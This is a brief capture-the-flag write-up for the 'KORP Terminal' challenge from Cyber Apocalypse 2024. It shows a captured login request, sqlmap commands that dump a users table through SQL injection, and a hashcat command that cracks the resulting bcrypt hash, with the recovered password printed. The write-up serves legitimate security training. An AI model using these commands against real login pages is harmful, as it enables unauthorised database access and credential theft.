KORP Terminal Writeup
Cyber Apocalypse 2024
Solved by : Legend, thewhiteh4t
- Challenge presents us with a login page
- Testing SQL injection shows that it is vulnerable
- POST request from burpsuite :
POST / HTTP/1.1
Host: 94.237.58.148:47562
Content-Length: 66
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.58.148:47562
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.58.148:47562
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
username=a&password=a
- SQLMap
> sqlmap -r post.txt --ignore-code 401
> sqlmap -r $PWD/post.txt --ignore-code 401 -T users -dump
- This hash is crackable with hashcat
> hashcat -a 0 -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.:password123